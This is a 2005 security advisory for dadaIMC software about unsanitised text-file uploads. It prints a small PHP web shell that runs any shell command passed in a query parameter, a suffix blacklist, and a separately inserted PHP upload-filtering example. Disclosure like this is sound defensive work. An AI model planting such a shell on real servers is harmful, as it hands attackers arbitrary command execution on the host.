dadaimc : http://www.dadaimc.org

Security Vulnerabilities

Malicious text file upload (UPDATED 2005-05-24)

Background

dadaIMC is content management software for the development of an Independent Media Center site.

Description

dadaIMC allows various media files to be uploaded, either directly to the Media Gallery, or in conjunction with a Feature or Newswire Article post. If the file being uploaded is of a MIME type which the web browser will execute as a text file, an individual may construct a text file containing PHP or other code enabling execution of normally restricted commands.

Because of the possibility of such attacks, file uploads to the Media Gallery are inspected for their MIME type, and all text files are run through a function to strip out potentially malicious code. Files uploaded with Newswire Articles, Features, or Comments, however, are not run through the same cleansing routine. This oversight allows an attacker the ability to upload a properly-constructed text file which can then be executed in the browser.

For example, a text file containing

<?php
$cmd = $_GET['cmd'];
passthru("$cmd", $return);
?>
would let an attacker run any shell command by passing it in the cmd query-string parameter when viewing the uploaded file's display page in a browser.

Analysis

Exploitation allows for an attacker to execute any possible shell command available to the user under which the web server is running. This could potentially include directory listings, file deletion or manipulation, or possibly full root access to the shell.

Detection

All versions of dadaIMC prior to .99.2 are vulnerable, and should be patched or updated immediately.

Workaround

The patch package supplied below contains new versions of imc_Article.inc and imc_Media.inc. Both files have version numbers ending in ".patched" and reflect the date 2005-05-05.

These new files include all previous patches and now restrict file uploads based on file suffix, for greater protection against MIME-type spoofing. Currently blacklisted suffixes are: 'asp','cgi','js','php','phtml','pl','py','rb','rbx'.

As a more restrictive alternative, you may uncomment code in each file to switch to a WHITELIST method, only permitting suffixes matching your whitelist. Comments are included in each file with appropriate instructions for modification.
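The suffix-based restriction described above, as an added example in PHP; this is not code from dadaIMC or its patch files, and the function name, the choice to check every dotted suffix, and the refusal of names without a suffix are this example's own assumptions:

```php
<?php
// Added example, not code from dadaIMC or its patch: a suffix check of the kind
// the patched imc_Article.inc / imc_Media.inc are described as adding.
// Function and variable names here are assumed, not taken from the project.

// Suffixes the advisory lists as blacklisted in the 2005-05-05 patch.
const DADAIMC_BLACKLIST = ['asp', 'cgi', 'js', 'php', 'phtml', 'pl', 'py', 'rb', 'rbx'];

// Decide whether an uploaded file name may be stored.
// $whitelist: null keeps blacklist mode; an array switches to whitelist-only mode.
// Every dotted suffix is checked, not just the last one, so "shell.php.txt" is
// still refused: some web servers pick a handler by any suffix in the name.
function upload_name_allowed(string $name, ?array $whitelist = null): bool
{
    // Strip any path component, then compare suffixes case-insensitively,
    // so "SHELL.PHP" cannot slip past a lowercase list.
    $base = strtolower(basename($name));
    $parts = explode('.', $base);
    if (count($parts) < 2 || $parts[0] === '') {
        return false; // no suffix at all, or a dot-file: refuse rather than guess
    }
    $suffixes = array_slice($parts, 1);

    foreach ($suffixes as $sfx) {
        if ($sfx === '') {
            return false; // trailing dot, e.g. "shell.php."
        }
        if ($whitelist === null) {
            if (in_array($sfx, DADAIMC_BLACKLIST, true)) {
                return false;
            }
        } elseif (!in_array($sfx, $whitelist, true)) {
            return false;
        }
    }
    return true;
}

// Only the server-side check above decides: $_FILES['upload']['type'] is supplied
// by the browser and can claim "text/plain" for a file that is really PHP source.
$cases = ['photo.jpg', 'shell.php', 'SHELL.PHP', 'shell.php.txt', 'notes.txt', 'README'];
foreach ($cases as $c) {
    printf("%-15s blacklist:%s whitelist:%s\n", $c,
        upload_name_allowed($c) ? 'allow' : 'deny',
        upload_name_allowed($c, ['jpg', 'gif', 'png', 'txt']) ? 'allow' : 'deny');
}
```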

Patch

File patch (fileuploadpatch.zip)

Timeline

2005-03-01 Vulnerability Report to Vendor
2005-03-02 Vendor offers patch
2005-04-28 Patch updated
2005-05-05 Added blacklist/whitelist functionality

Credit

Report Bugs

dadaIMC uses the Mantis bug-tracking system for bug reporting. Please use it! And check for existing reports of your bug before submitting a new one.

CVS

The current CVS version of dadaIMC is now browseable online. Be forewarned, though, that it is not always in a useable state as-is!
